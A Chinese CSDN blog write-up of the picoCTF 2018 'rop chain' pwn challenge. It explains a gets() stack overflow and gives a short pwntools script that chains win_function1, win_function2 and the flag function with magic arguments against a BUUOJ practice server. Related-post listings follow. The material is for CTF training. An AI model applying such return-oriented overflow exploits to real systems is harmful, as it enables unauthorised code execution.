picoctf_2018_rop chain

已于 2022-08-10 15:47:08 修改
阅读量260 收藏 1
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
于 2022-08-10 15:44:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/126267659
版权

照例checksec 

 32位 只开了nx 查看ida

查看main顺进去看

get()栈溢出

直接 有个flag,开冲!!!!

初步看,满足win1 && win2 && a1 == -559039827 我们就能得到flag了

进入到win_function1()

直接跳转即可

接下来是win_function2() 

 

也是满足条件即可

接下来直接构造exp即可。

from pwn import *
context(log_level='debug')

io=remote('node4.buuoj.cn',27256)

flag=0x804862B
win1=0x80485CB
win2=0x80485D8
a11=0xBAAAAAAD
a12=0xDEADBAAD

io.recvuntil('>')
payload='a'*(0x18+4)+p32(win1)+p32(win2)+p32(flag)+p32(a11)+p32(a12)

io.sendline(payload)
io.interactive()

说说a11,a12

选定右键选择Hexadecimal

 flag:

YameMres
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PicoCTF_2018_rop_chain
m0_74073577的博客
02-23 390
PicoCTF_2018_rop_chain
picoctf_2018_rop chain wp(python3)
Kata_Jhin的博客
06-02 264
picoctf_2018_rop chain wp(python3)
【BUUCTFPWN】picoctf_2018_rop chain
m0_55368674的博客
01-19 191
ret2text
PicoCTF_2018_rop_chain解题
最新发布
2301_81504456的博客
07-25 152
上面的flag函数中也是只定义了一个参数a1为另一个值,在构造payload时就要注意分开,a1分别是两个函数的局部变量,要满足各自if的条件,win1中没有定义变量,就不用传递参数。3.保证win1,win2都大于0且a1=0xDEADBAAD的情况下打印出flag,win1函数直接赋值给win1的值是1,win2中传递了参数a1,在这个函数中传给0xBAAAAAAD,则保证了win2是1。fgets(arg1[存储读取数据的位置],arg2[读取的前多少位],arg3[被读取数据的位置])
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
exrop:自动ROPChain生成
04-23
Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将...
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
"stm8l001j3.pdf"和"stm8s001j3_2018.pdf"以及"STM8S001J3.pdf"虽然主要针对的是STM8L001J3和STM8S001J3型号,但可能包含了一些通用的信息和概念,例如闪存操作和安全特性,对于理解STM8S103的ROP问题也有参考价值。...
Rops.rar_The Conversion_rops
09-22
Note that this rop-form instruction has no dex-form equivilent and must be removed before the dex conversion.
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
buuctf30 picoctf_2018_rop chain 1
weixin_74861133的博客
11-23 58
只开启了NX保护。
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 990
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
二十、ROP实践
wanhex的博客
03-10 751
在路由器漏洞利用的场景中,一般使用两种常用的利用方法,一种是上次分享中使用的System/Exec方式,一种就是本节中我们要分享的ROP Chain方式。 ROP(Returen-Oriented Programming)是把原来已经存在的代码块拼接起来,拼接时使用一个预先准备好的、包含各条指令结束后下一条指令地址的特殊返回栈。一般的程序里都包含着大量的返回指令,如“jr $ra”,他们大都位于函...
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 472
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1184
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1374
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3306
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
小白详解rop emporium
BadRer的博客
08-02 2099
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值